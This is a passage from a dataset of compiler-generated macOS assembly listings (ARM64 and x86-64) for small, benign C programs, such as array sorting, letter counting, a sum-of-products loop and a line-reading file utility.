__DATA,__common,_UNINITIALIZED,4,2 .section __DATA,__data .globl _SIGN ## @SIGN .p2align 2 _SIGN: .long 2 ## 0x2 .globl _VERIFY ## @VERIFY .p2align 2 _VERIFY: .long 3 ## 0x3 .comm _S_state,4,2 ## @S_state .subsections_via_symbols
the_stack_data/175141907.c
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _cmp1 ; -- Begin function cmp1 .p2align 2 _cmp1: ; @cmp1 .cfi_startproc ; %bb.0: sub sp, sp, #16 .cfi_def_cfa_offset 16 str x0, [sp, #8] str x1, [sp] ldr x8, [sp] ldr w8, [x8] ldr x9, [sp, #8] ldr w9, [x9] subs w0, w8, w9 add sp, sp, #16 ret .cfi_endproc ; -- End function .globl _main ; -- Begin function main .p2align 2 _main: ; @main .cfi_startproc ; %bb.0: sub sp, sp, #80 .cfi_def_cfa_offset 80 stp x29, x30, [sp, #64] ; 16-byte Folded Spill add x29, sp, #64 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 adrp x8, _s@GOTPAGE ldr x8, [x8, _s@GOTPAGEOFF] str x8, [sp, #24] ; 8-byte Folded Spill stur wzr, [x29, #-4] mov w8, #1 stur w8, [x29, #-28] str wzr, [sp, #32] mov x9, sp sub x8, x29, #8 str x8, [x9] adrp x0, l_.str@PAGE add x0, x0, l_.str@PAGEOFF bl _scanf stur wzr, [x29, #-16] b LBB1_1 LBB1_1: ; =>This Inner Loop Header: Depth=1 ldur w8, [x29, #-16] ldur w9, [x29, #-8] subs w8, w8, w9 cset w8, ge tbnz w8, #0, LBB1_4 b LBB1_2 LBB1_2: ; in Loop: Header=BB1_1 Depth=1 ldr x8, [sp, #24] ; 8-byte Folded Reload ldursw x9, [x29, #-16] add x8, x8, x9, lsl #2 mov x9, sp str x8, [x9] adrp x0, l_.str@PAGE add x0, x0, l_.str@PAGEOFF bl _scanf b LBB1_3 LBB1_3: ; in Loop: Header=BB1_1 Depth=1 ldur w8, [x29, #-16] add w8, w8, #1 stur w8, [x29, #-16] b LBB1_1 LBB1_4: mov x9, sp sub x8, x29, #12 str x8, [x9] adrp x0, l_.str@PAGE add x0, x0, l_.str@PAGEOFF bl _scanf ldr x0, [sp, #24] ; 8-byte Folded Reload ldursw x1, [x29, #-8] mov x2, #4 adrp x3, _cmp1@PAGE add x3, x3, _cmp1@PAGEOFF bl _qsort stur wzr, [x29, #-20] b LBB1_5 LBB1_5: ; =>This Inner Loop Header: Depth=1 ldur w8, [x29, #-20] ldur w9, [x29, #-8] subs w8, w8, w9 cset w8, ge tbnz w8, #0, LBB1_14 b LBB1_6 LBB1_6: ; in Loop: Header=BB1_5 Depth=1 ldr x9, [sp, #24] ; 8-byte Folded Reload ldur w8, [x29, #-20] add w8, w8, #1 ldr w8, [x9, w8, sxtw #2] ldursw x10, [x29, #-20] ldr w9, [x9, x10, lsl #2] subs w8, w8, w9 cset w8, eq tbnz w8, #0, LBB1_8 b LBB1_7 LBB1_7: ; in Loop: Header=BB1_5 Depth=1 ldur w8, [x29, #-28] add w8, w8, #1 stur w8, [x29, #-28] b LBB1_8 LBB1_8: ; in Loop: Header=BB1_5 Depth=1 ldur w8, [x29, #-28] ldur w9, [x29, #-12] subs w8, w8, w9 cset w8, ne tbnz w8, #0, LBB1_10 b LBB1_9 LBB1_9: ; in Loop: Header=BB1_5 Depth=1 ldr w8, [sp, #32] add w8, w8, #1 str w8, [sp, #32] b LBB1_10 LBB1_10: ; in Loop: Header=BB1_5 Depth=1 ldur w8, [x29, #-28] ldur w9, [x29, #-12] add w9, w9, #1 subs w8, w8, w9 cset w8, ne tbnz w8, #0, LBB1_12 b LBB1_11 LBB1_11: b LBB1_14 LBB1_12: ; in Loop: Header=BB1_5 Depth=1 b LBB1_13 LBB1_13: ; in Loop: Header=BB1_5 Depth=1 ldur w8, [x29, #-20] add w8, w8, #1 stur w8, [x29, #-20] b LBB1_5 LBB1_14: ldr x8, [sp, #24] ; 8-byte Folded Reload ldursw x9, [x29, #-20] ldr w8, [x8, x9, lsl #2] ; implicit-def: $x10 mov x10, x8 ldr w9, [sp, #32] ; implicit-def: $x8 mov x8, x9 mov x9, sp str x10, [x9] str x8, [x9, #8] adrp x0, l_.str.1@PAGE add x0, x0, l_.str.1@PAGEOFF bl _printf mov w0, #0 ldp x29, x30, [sp, #64] ; 16-byte Folded Reload add sp, sp, #80 ret .cfi_endproc ; -- End function .section __TEXT,__cstring,cstring_literals l_.str: ; @.str .asciz "%d" .comm _s,40000000,2 ; @s l_.str.1: ; @.str.1 .asciz "%d %d" .subsections_via_symbols
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _cmp1 ## -- Begin function cmp1 .p2align 4, 0x90 _cmp1: ## @cmp1 .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp movq %rdi, -8(%rbp) movq %rsi, -16(%rbp) movq -16(%rbp), %rax movl (%rax), %eax movq -8(%rbp), %rcx subl (%rcx), %eax popq %rbp retq .cfi_endproc ## -- End function .globl _main ## -- Begin function main .p2align 4, 0x90 _main: ## @main .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $32, %rsp movl $0, -4(%rbp) movl $1, -28(%rbp) movl $0, -32(%rbp) leaq L_.str(%rip), %rdi leaq -8(%rbp), %rsi movb $0, %al callq _scanf movl $0, -16(%rbp) LBB1_1: ## =>This Inner Loop Header: Depth=1 movl -16(%rbp), %eax cmpl -8(%rbp), %eax jge LBB1_4 ## %bb.2: ## in Loop: Header=BB1_1 Depth=1 movslq -16(%rbp), %rax movq _s@GOTPCREL(%rip), %rsi shlq $2, %rax addq %rax, %rsi leaq L_.str(%rip), %rdi movb $0, %al callq _scanf ## %bb.3: ## in Loop: Header=BB1_1 Depth=1 movl -16(%rbp), %eax addl $1, %eax movl %eax, -16(%rbp) jmp LBB1_1 LBB1_4: leaq L_.str(%rip), %rdi leaq -12(%rbp), %rsi movb $0, %al callq _scanf movslq -8(%rbp), %rsi movq _s@GOTPCREL(%rip), %rdi movl $4, %edx leaq _cmp1(%rip), %rcx callq _qsort movl $0, -20(%rbp) LBB1_5: ## =>This Inner Loop Header: Depth=1 movl -20(%rbp), %eax cmpl -8(%rbp), %eax jge LBB1_14 ## %bb.6: ## in Loop: Header=BB1_5 Depth=1 movl -20(%rbp), %eax addl $1, %eax movslq %eax, %rcx movq _s@GOTPCREL(%rip), %rax movl (%rax,%rcx,4), %eax movslq -20(%rbp), %rdx movq _s@GOTPCREL(%rip), %rcx cmpl (%rcx,%rdx,4), %eax je LBB1_8 ## %bb.7: ## in Loop: Header=BB1_5 Depth=1 movl -28(%rbp), %eax addl $1, %eax movl %eax, -28(%rbp) LBB1_8: ## in Loop: Header=BB1_5 Depth=1 movl -28(%rbp), %eax cmpl -12(%rbp), %eax jne LBB1_10 ## %bb.9: ## in Loop: Header=BB1_5 Depth=1 movl -32(%rbp), %eax addl $1, %eax movl %eax, -32(%rbp) LBB1_10: ## in Loop: Header=BB1_5 Depth=1 movl -28(%rbp), %eax movl -12(%rbp), %ecx addl $1, %ecx cmpl %ecx, %eax jne LBB1_12 ## %bb.11: jmp LBB1_14 LBB1_12: ## in Loop: Header=BB1_5 Depth=1 jmp LBB1_13 LBB1_13: ## in Loop: Header=BB1_5 Depth=1 movl -20(%rbp), %eax addl $1, %eax movl %eax, -20(%rbp) jmp LBB1_5 LBB1_14: movslq -20(%rbp), %rcx movq _s@GOTPCREL(%rip), %rax movl (%rax,%rcx,4), %esi movl -32(%rbp), %edx leaq L_.str.1(%rip), %rdi movb $0, %al callq _printf xorl %eax, %eax addq $32, %rsp popq %rbp retq .cfi_endproc ## -- End function .section __TEXT,__cstring,cstring_literals L_.str: ## @.str .asciz "%d" .comm _s,40000000,4 ## @s L_.str.1: ## @.str.1 .asciz "%d %d" .subsections_via_symbols
the_stack_data/1086680.c
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _main ; -- Begin function main .p2align 2 _main: ; @main .cfi_startproc ; %bb.0: sub sp, sp, #48 .cfi_def_cfa_offset 48 stp x29, x30, [sp, #32] ; 16-byte Folded Spill add x29, sp, #32 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 mov w8, #0 str w8, [sp, #12] ; 4-byte Folded Spill stur wzr, [x29, #-4] stur w0, [x29, #-8] str x1, [sp, #16] adrp x0, l_.str@PAGE add x0, x0, l_.str@PAGEOFF bl _printf ldr w0, [sp, #12] ; 4-byte Folded Reload ldp x29, x30, [sp, #32] ; 16-byte Folded Reload add sp, sp, #48 ret .cfi_endproc ; -- End function .section __TEXT,__cstring,cstring_literals l_.str: ; @.str .asciz "asdasd!!!\n" .subsections_via_symbols
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _main ## -- Begin function main .p2align 4, 0x90 _main: ## @main .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $16, %rsp movl $0, -4(%rbp) movl %edi, -8(%rbp) movq %rsi, -16(%rbp) leaq L_.str(%rip), %rdi movb $0, %al callq _printf xorl %eax, %eax addq $16, %rsp popq %rbp retq .cfi_endproc ## -- End function .section __TEXT,__cstring,cstring_literals L_.str: ## @.str .asciz "asdasd!!!\n" .subsections_via_symbols
the_stack_data/89200972.c
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _main ; -- Begin function main .p2align 2 _main: ; @main .cfi_startproc ; %bb.0: sub sp, sp, #80 .cfi_def_cfa_offset 80 stp x29, x30, [sp, #64] ; 16-byte Folded Spill add x29, sp, #64 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 stur wzr, [x29, #-4] mov x9, sp sub x8, x29, #8 str x8, [x9] adrp x0, l_.str@PAGE add x0, x0, l_.str@PAGEOFF bl _scanf stur wzr, [x29, #-24] b LBB0_1 LBB0_1: ; =>This Loop Header: Depth=1 ; Child Loop BB0_3 Depth 2 ; Child Loop BB0_7 Depth 2 ; Child Loop BB0_11 Depth 2 ldur w8, [x29, #-24] ldur w9, [x29, #-8] subs w8, w8, w9 cset w8, ge tbnz w8, #0, LBB0_18 b LBB0_2 LBB0_2: ; in Loop: Header=BB0_1 Depth=1 mov x0, #1000 bl _malloc stur x0, [x29, #-16] ldur x8, [x29, #-16] mov x9, sp str x8, [x9] adrp x0, l_.str.1@PAGE add x0, x0, l_.str.1@PAGEOFF bl _scanf mov x0, #104 bl _malloc str x0, [sp, #24] stur wzr, [x29, #-28] b LBB0_3 LBB0_3: ; Parent Loop BB0_1 Depth=1 ; => This Inner Loop Header: Depth=2 ldur w8, [x29, #-28] subs w8, w8, #26 cset w8, ge tbnz w8, #0, LBB0_6 b LBB0_4 LBB0_4: ; in Loop: Header=BB0_3 Depth=2 ldr x9, [sp, #24] ldursw x10, [x29, #-28] mov w8, #0 str w8, [x9, x10, lsl #2] b LBB0_5 LBB0_5: ; in Loop: Header=BB0_3 Depth=2 ldur w8, [x29, #-28] add w8, w8, #1 stur w8, [x29, #-28] b LBB0_3 LBB0_6: ; in Loop: Header=BB0_1 Depth=1 stur wzr, [x29, #-28] b LBB0_7 LBB0_7: ; Parent Loop BB0_1 Depth=1 ; => This Inner Loop Header: Depth=2 ldur x8, [x29, #-16] ldursw x9, [x29, #-28] ldrsb w8, [x8, x9] subs w8, w8, #0 cset w8, eq tbnz w8, #0, LBB0_10 b LBB0_8 LBB0_8: ; in Loop: Header=BB0_7 Depth=2 ldr x8, [sp, #24] ldur x9, [x29, #-16] ldursw x10, [x29, #-28] ldrsb w9, [x9, x10] subs w9, w9, #97 add x9, x8, w9, sxtw #2 ldr w8, [x9] add w8, w8, #1 str w8, [x9] b LBB0_9 LBB0_9: ; in Loop: Header=BB0_7 Depth=2 ldur w8, [x29, #-28] add w8, w8, #1 stur w8, [x29, #-28] b LBB0_7 LBB0_10: ; in Loop: Header=BB0_1 Depth=1 stur wzr, [x29, #-20] stur wzr, [x29, #-28] b LBB0_11 LBB0_11: ; Parent Loop BB0_1 Depth=1 ; => This Inner Loop Header: Depth=2 ldur w8, [x29, #-28] subs w8, w8, #26 cset w8, ge tbnz w8, #0, LBB0_16 b LBB0_12 LBB0_12: ; in Loop: Header=BB0_11 Depth=2 ldr x8, [sp, #24] ldursw x9, [x29, #-28] ldr w8, [x8, x9, lsl #2] ldr x9, [sp, #24] ldursw x10, [x29, #-20] ldr w9, [x9, x10, lsl #2] subs w8, w8, w9 cset w8, le tbnz w8, #0, LBB0_14 b LBB0_13 LBB0_13: ; in Loop: Header=BB0_11 Depth=2 ldur w8, [x29, #-28] stur w8, [x29, #-20] b LBB0_14 LBB0_14: ; in Loop: Header=BB0_11 Depth=2 b LBB0_15 LBB0_15: ; in Loop: Header=BB0_11 Depth=2 ldur w8, [x29, #-28] add w8, w8, #1 stur w8, [x29, #-28] b LBB0_11 LBB0_16: ; in Loop: Header=BB0_1 Depth=1 ldur w8, [x29, #-20] add w11, w8, #97 ldr x8, [sp, #24] ldursw x9, [x29, #-20] ldr w9, [x8, x9, lsl #2] ; implicit-def: $x8 mov x8, x9 mov x9, sp ; implicit-def: $x10 mov x10, x11 str x10, [x9] str x8, [x9, #8] adrp x0, l_.str.2@PAGE add x0, x0, l_.str.2@PAGEOFF bl _printf ldr x0, [sp, #24] bl _free ldur x0, [x29, #-16] bl _free b LBB0_17 LBB0_17: ; in Loop: Header=BB0_1 Depth=1 ldur w8, [x29, #-24] add w8, w8, #1 stur w8, [x29, #-24] b LBB0_1 LBB0_18: mov w0, #0 ldp x29, x30, [sp, #64] ; 16-byte Folded Reload add sp, sp, #80 ret .cfi_endproc ; -- End function .section __TEXT,__cstring,cstring_literals l_.str: ; @.str .asciz "%d" l_.str.1: ; @.str.1 .asciz "%s" l_.str.2: ; @.str.2 .asciz "%c %d\n" .subsections_via_symbols
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _main ## -- Begin function main .p2align 4, 0x90 _main: ## @main .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $48, %rsp movl $0, -4(%rbp) leaq L_.str(%rip), %rdi leaq -8(%rbp), %rsi movb $0, %al callq _scanf movl $0, -24(%rbp) LBB0_1: ## =>This Loop Header: Depth=1 ## Child Loop BB0_3 Depth 2 ## Child Loop BB0_7 Depth 2 ## Child Loop BB0_11 Depth 2 movl -24(%rbp), %eax cmpl -8(%rbp), %eax jge LBB0_18 ## %bb.2: ## in Loop: Header=BB0_1 Depth=1 movl $1000, %edi ## imm = 0x3E8 callq _malloc movq %rax, -16(%rbp) movq -16(%rbp), %rsi leaq L_.str.1(%rip), %rdi movb $0, %al callq _scanf movl $104, %edi callq _malloc movq %rax, -40(%rbp) movl $0, -28(%rbp) LBB0_3: ## Parent Loop BB0_1 Depth=1 ## => This Inner Loop Header: Depth=2 cmpl $26, -28(%rbp) jge LBB0_6 ## %bb.4: ## in Loop: Header=BB0_3 Depth=2 movq -40(%rbp), %rax movslq -28(%rbp), %rcx movl $0, (%rax,%rcx,4) ## %bb.5: ## in Loop: Header=BB0_3 Depth=2 movl -28(%rbp), %eax addl $1, %eax movl %eax, -28(%rbp) jmp LBB0_3 LBB0_6: ## in Loop: Header=BB0_1 Depth=1 movl $0, -28(%rbp) LBB0_7: ## Parent Loop BB0_1 Depth=1 ## => This Inner Loop Header: Depth=2 movq -16(%rbp), %rax movslq -28(%rbp), %rcx movsbl (%rax,%rcx), %eax cmpl $0, %eax je LBB0_10 ## %bb.8: ## in Loop: Header=BB0_7 Depth=2 movq -40(%rbp), %rax movq -16(%rbp), %rcx movslq -28(%rbp), %rdx movsbl (%rcx,%rdx), %ecx subl $97, %ecx movslq %ecx, %rcx movl (%rax,%rcx,4), %edx addl $1, %edx movl %edx, (%rax,%rcx,4) ## %bb.9: ## in Loop: Header=BB0_7 Depth=2 movl -28(%rbp), %eax addl $1, %eax movl %eax, -28(%rbp) jmp LBB0_7 LBB0_10: ## in Loop: Header=BB0_1 Depth=1 movl $0, -20(%rbp) movl $0, -28(%rbp) LBB0_11: ## Parent Loop BB0_1 Depth=1 ## => This Inner Loop Header: Depth=2 cmpl $26, -28(%rbp) jge LBB0_16 ## %bb.12: ## in Loop: Header=BB0_11 Depth=2 movq -40(%rbp), %rax movslq -28(%rbp), %rcx movl (%rax,%rcx,4), %eax movq -40(%rbp), %rcx movslq -20(%rbp), %rdx cmpl (%rcx,%rdx,4), %eax jle LBB0_14 ## %bb.13: ## in Loop: Header=BB0_11 Depth=2 movl -28(%rbp), %eax movl %eax, -20(%rbp) LBB0_14: ## in Loop: Header=BB0_11 Depth=2 jmp LBB0_15 LBB0_15: ## in Loop: Header=BB0_11 Depth=2 movl -28(%rbp), %eax addl $1, %eax movl %eax, -28(%rbp) jmp LBB0_11 LBB0_16: ## in Loop: Header=BB0_1 Depth=1 movl -20(%rbp), %esi addl $97, %esi movq -40(%rbp), %rax movslq -20(%rbp), %rcx movl (%rax,%rcx,4), %edx leaq L_.str.2(%rip), %rdi movb $0, %al callq _printf movq -40(%rbp), %rdi callq _free movq -16(%rbp), %rdi callq _free ## %bb.17: ## in Loop: Header=BB0_1 Depth=1 movl -24(%rbp), %eax addl $1, %eax movl %eax, -24(%rbp) jmp LBB0_1 LBB0_18: xorl %eax, %eax addq $48, %rsp popq %rbp retq .cfi_endproc ## -- End function .section __TEXT,__cstring,cstring_literals L_.str: ## @.str .asciz "%d" L_.str.1: ## @.str.1 .asciz "%s" L_.str.2: ## @.str.2 .asciz "%c %d\n" .subsections_via_symbols
the_stack_data/36074696.c
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _main ; -- Begin function main .p2align 2 _main: ; @main .cfi_startproc ; %bb.0: sub sp, sp, #64 .cfi_def_cfa_offset 64 stp x29, x30, [sp, #48] ; 16-byte Folded Spill add x29, sp, #48 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 stur wzr, [x29, #-4] str xzr, [sp, #16] mov x8, #1 stur x8, [x29, #-16] b LBB0_1 LBB0_1: ; =>This Loop Header: Depth=1 ; Child Loop BB0_3 Depth 2 ldur x8, [x29, #-16] subs x8, x8, #100 cset w8, gt tbnz w8, #0, LBB0_10 b LBB0_2 LBB0_2: ; in Loop: Header=BB0_1 Depth=1 mov x8, #1 str x8, [sp, #24] b LBB0_3 LBB0_3: ; Parent Loop BB0_1 Depth=1 ; => This Inner Loop Header: Depth=2 ldr x8, [sp, #24] subs x8, x8, #100 cset w8, gt tbnz w8, #0, LBB0_8 b LBB0_4 LBB0_4: ; in Loop: Header=BB0_3 Depth=2 ldur x8, [x29, #-16] ldr x9, [sp, #24] subs x8, x8, x9 cset w8, eq tbnz w8, #0, LBB0_6 b LBB0_5 LBB0_5: ; in Loop: Header=BB0_3 Depth=2 ldur x8, [x29, #-16] ldr x9, [sp, #24] mul x9, x8, x9 ldr x8, [sp, #16] add x8, x8, x9 str x8, [sp, #16] b LBB0_6 LBB0_6: ; in Loop: Header=BB0_3 Depth=2 b LBB0_7 LBB0_7: ; in Loop: Header=BB0_3 Depth=2 ldr x8, [sp, #24] add x8, x8, #1 str x8, [sp, #24] b LBB0_3 LBB0_8: ; in Loop: Header=BB0_1 Depth=1 b LBB0_9 LBB0_9: ; in Loop: Header=BB0_1 Depth=1 ldur x8, [x29, #-16] add x8, x8, #1 stur x8, [x29, #-16] b LBB0_1 LBB0_10: ldr x8, [sp, #16] mov x9, sp str x8, [x9] adrp x0, l_.str@PAGE add x0, x0, l_.str@PAGEOFF bl _printf ldur w0, [x29, #-4] ldp x29, x30, [sp, #48] ; 16-byte Folded Reload add sp, sp, #64 ret .cfi_endproc ; -- End function .section __TEXT,__cstring,cstring_literals l_.str: ; @.str .asciz "The difference between the sum of the squares of the first 100 natural numbers and the square of the sum is %ld\n" .subsections_via_symbols
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _main ## -- Begin function main .p2align 4, 0x90 _main: ## @main .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $32, %rsp movl $0, -4(%rbp) movq $0, -32(%rbp) movq $1, -16(%rbp) LBB0_1: ## =>This Loop Header: Depth=1 ## Child Loop BB0_3 Depth 2 cmpq $100, -16(%rbp) jg LBB0_10 ## %bb.2: ## in Loop: Header=BB0_1 Depth=1 movq $1, -24(%rbp) LBB0_3: ## Parent Loop BB0_1 Depth=1 ## => This Inner Loop Header: Depth=2 cmpq $100, -24(%rbp) jg LBB0_8 ## %bb.4: ## in Loop: Header=BB0_3 Depth=2 movq -16(%rbp), %rax cmpq -24(%rbp), %rax je LBB0_6 ## %bb.5: ## in Loop: Header=BB0_3 Depth=2 movq -16(%rbp), %rax imulq -24(%rbp), %rax addq -32(%rbp), %rax movq %rax, -32(%rbp) LBB0_6: ## in Loop: Header=BB0_3 Depth=2 jmp LBB0_7 LBB0_7: ## in Loop: Header=BB0_3 Depth=2 movq -24(%rbp), %rax addq $1, %rax movq %rax, -24(%rbp) jmp LBB0_3 LBB0_8: ## in Loop: Header=BB0_1 Depth=1 jmp LBB0_9 LBB0_9: ## in Loop: Header=BB0_1 Depth=1 movq -16(%rbp), %rax addq $1, %rax movq %rax, -16(%rbp) jmp LBB0_1 LBB0_10: movq -32(%rbp), %rsi leaq L_.str(%rip), %rdi movb $0, %al callq _printf movl -4(%rbp), %eax addq $32, %rsp popq %rbp retq .cfi_endproc ## -- End function .section __TEXT,__cstring,cstring_literals L_.str: ## @.str .asciz "The difference between the sum of the squares of the first 100 natural numbers and the square of the sum is %ld\n" .subsections_via_symbols
the_stack_data/90766619.c
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _main ; -- Begin function main .p2align 2 _main: ; @main .cfi_startproc ; %bb.0: stp x28, x27, [sp, #-32]! ; 16-byte Folded Spill .cfi_def_cfa_offset 32 stp x29, x30, [sp, #16] ; 16-byte Folded Spill add x29, sp, #16 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 .cfi_offset w27, -24 .cfi_offset w28, -32 mov w9, #1296 movk w9, #2, lsl #16 adrp x16, ___chkstk_darwin@GOTPAGE ldr x16, [x16, ___chkstk_darwin@GOTPAGEOFF] blr x16 sub sp, sp, #32, lsl #12 ; =131072 sub sp, sp, #1296 adrp x8, ___stack_chk_guard@GOTPAGE ldr x8, [x8, ___stack_chk_guard@GOTPAGEOFF] ldr x8, [x8] stur x8, [x29, #-24] str wzr, [sp, #132] str w0, [sp, #128] str x1, [sp, #120] str wzr, [sp, #108] str wzr, [sp, #92] str wzr, [sp, #88] ldr w8, [sp, #128] subs w8, w8, #2 cset w8, le tbnz w8, #0, LBB0_2 b LBB0_1 LBB0_1: adrp x0, l_.str@PAGE add x0, x0, l_.str@PAGEOFF mov w1, #2 str w1, [sp, #84] ; 4-byte Folded Spill bl _dputs ldr w1, [sp, #84] ; 4-byte Folded Reload ldr x8, [sp, #120] ldr x0, [x8] bl _dputs ldr w1, [sp, #84] ; 4-byte Folded Reload adrp x0, l_.str.1@PAGE add x0, x0, l_.str.1@PAGEOFF bl _dputs mov w0, #1 bl __exit b LBB0_2 LBB0_2: str wzr, [sp, #100] b LBB0_3 LBB0_3: ; =>This Loop Header: Depth=1 ; Child Loop BB0_5 Depth 2 ldr w8, [sp, #100] subs w8, w8, #1024 cset w8, ge tbnz w8, #0, LBB0_10 b LBB0_4 LBB0_4: ; in Loop: Header=BB0_3 Depth=1 str wzr, [sp, #96] b LBB0_5 LBB0_5: ; Parent Loop BB0_3 Depth=1 ; => This Inner Loop Header: Depth=2 ldr w8, [sp, #96] subs w8, w8, #128 cset w8, ge tbnz w8, #0, LBB0_8 b LBB0_6 LBB0_6: ; in Loop: Header=BB0_5 Depth=2 ldrsw x9, [sp, #100] add x8, sp, #1288 add x8, x8, x9, lsl #7 ldrsw x9, [sp, #96] add x8, x8, x9 strb wzr, [x8] b LBB0_7 LBB0_7: ; in Loop: Header=BB0_5 Depth=2 ldr w8, [sp, #96] add w8, w8, #1 str w8, [sp, #96] b LBB0_5 LBB0_8: ; in Loop: Header=BB0_3 Depth=1 b LBB0_9 LBB0_9: ; in Loop: Header=BB0_3 Depth=1 ldr w8, [sp, #100] add w8, w8, #1 str w8, [sp, #100] b LBB0_3 LBB0_10: ldr w8, [sp, #128] subs w8, w8, #2 cset w8, ne tbnz w8, #0, LBB0_29 b LBB0_11 LBB0_11: str wzr, [sp, #100] b LBB0_12 LBB0_12: ; =>This Inner Loop Header: Depth=1 ldrsw x8, [sp, #100] str x8, [sp, #72] ; 8-byte Folded Spill ldr x8, [sp, #120] ldr x0, [x8, #8] bl _strlen ldr x8, [sp, #72] ; 8-byte Folded Reload subs x8, x8, x0 cset w8, hs tbnz w8, #0, LBB0_15 b LBB0_13 LBB0_13: ; in Loop: Header=BB0_12 Depth=1 ldr x8, [sp, #120] ldr x8, [x8, #8] ldrsw x9, [sp, #100] add x8, x8, x9 ldrb w8, [x8] ldrsw x10, [sp, #100] add x9, sp, #264 add x9, x9, x10 strb w8, [x9] b LBB0_14 LBB0_14: ; in Loop: Header=BB0_12 Depth=1 ldr w8, [sp, #100] add w8, w8, #1 str w8, [sp, #100] b LBB0_12 LBB0_15: ldrsw x9, [sp, #100] add x0, sp, #264 mov x8, x0 add x8, x8, x9 strb wzr, [x8] mov w8, #1 str w8, [sp, #88] mov w2, #0 mov x1, x2 bl _open mov x8, x0 mov x9, x0 str w9, [sp, #104] subs w8, w8, #3 cset w8, ge tbnz w8, #0, LBB0_17 b LBB0_16 LBB0_16: adrp x0, l_.str.2@PAGE add x0, x0, l_.str.2@PAGEOFF mov w1, #2 str w1, [sp, #68] ; 4-byte Folded Spill bl _dputs ldr w1, [sp, #68] ; 4-byte Folded Reload add x0, sp, #264 bl _dputs ldr w1, [sp, #68] ; 4-byte Folded Reload adrp x0, l_.str.3@PAGE add x0, x0, l_.str.3@PAGEOFF bl _dputs b LBB0_30 LBB0_17: b LBB0_18 LBB0_18: ; =>This Inner Loop Header: Depth=1 ldr w0, [sp, #104] add x1, sp, #114 mov x2, #1 bl _read subs x8, x0, #0 cset w8, le tbnz w8, #0, LBB0_26 b LBB0_19 LBB0_19: ; in Loop: Header=BB0_18 Depth=1 ldrb w8, [sp, #114] ldrsw x10, [sp, #92] add x9, sp, #1288 add x9, x9, x10, lsl #7 ldrsw x10, [sp, #108] add x9, x9, x10 strb w8, [x9] ldr w8, [sp, #108] add w8, w8, #1 str w8, [sp, #108] subs w8, w8, #126 cset w8, le tbnz w8, #0, LBB0_21 b LBB0_20 LBB0_20: ; in Loop: Header=BB0_18 Depth=1 adrp x0, l_.str.4@PAGE add x0, x0, l_.str.4@PAGEOFF mov w1, #2 str w1, [sp, #64] ; 4-byte Folded Spill bl _dputs ldr w1, [sp, #64] ; 4-byte Folded Reload ldr w0, [sp, #92] bl _dputi ldr w1, [sp, #64] ; 4-byte Folded Reload adrp x0, l_.str.5@PAGE add x0, x0, l_.str.5@PAGEOFF bl _dputs b LBB0_21 LBB0_21: ; in Loop: Header=BB0_18 Depth=1 ldrsb w8, [sp, #114] subs w8, w8, #10 cset w8, ne tbnz w8, #0, LBB0_25 b LBB0_22 LBB0_22: ; in Loop: Header=BB0_18 Depth=1 ldr w8, [sp, #92] add w8, w8, #1 str w8, [sp, #92] subs w8, w8, #1023 cset w8, le tbnz w8, #0, LBB0_24 b LBB0_23 LBB0_23: ; in Loop: Header=BB0_18 Depth=1 adrp x0, l_.str.6@PAGE add x0, x0, l_.str.6@PAGEOFF mov w1, #2 str w1, [sp, #60] ; 4-byte Folded Spill bl _dputs ldr w1, [sp, #60] ; 4-byte Folded Reload ldr x8, [sp, #120] ldr x0, [x8, #8] bl _dputs ldr w1, [sp, #60] ; 4-byte Folded Reload adrp x0, l_.str.7@PAGE add x0, x0, l_.str.7@PAGEOFF bl _dputs mov w0, #1 bl __exit b LBB0_24 LBB0_24: ; in Loop: Header=BB0_18 Depth=1 str wzr, [sp, #108] b LBB0_25 LBB0_25: ; in Loop: Header=BB0_18 Depth=1 b LBB0_18 LBB0_26: ldr w0, [sp, #104] bl _close adds x8, x0, #1 cset w8, ne tbnz w8, #0, LBB0_28 b LBB0_27 LBB0_27: adrp x0, l_.str.8@PAGE add x0, x0, l_.str.8@PAGEOFF mov w1, #2 str w1, [sp, #56] ; 4-byte Folded Spill bl _dputs ldr w1, [sp, #56] ; 4-byte Folded Reload add x0, sp, #264 bl _dputs ldr w1, [sp, #56] ; 4-byte Folded Reload adrp x0, l_.str.3@PAGE add x0, x0, l_.str.3@PAGEOFF bl _dputs mov w0, #1 bl __exit b LBB0_28 LBB0_28: b LBB0_29 LBB0_29: b LBB0_30 LBB0_30: ldr w0, [sp, #92] mov w1, #1 str w1, [sp, #52] ; 4-byte Folded Spill bl _dputi ldr w1, [sp, #52] ; 4-byte Folded Reload adrp x0, l_.str.3@PAGE add x0, x0, l_.str.3@PAGEOFF bl _dputs b LBB0_31 LBB0_31: ; =>This Loop Header: Depth=1 ; Child Loop BB0_122 Depth 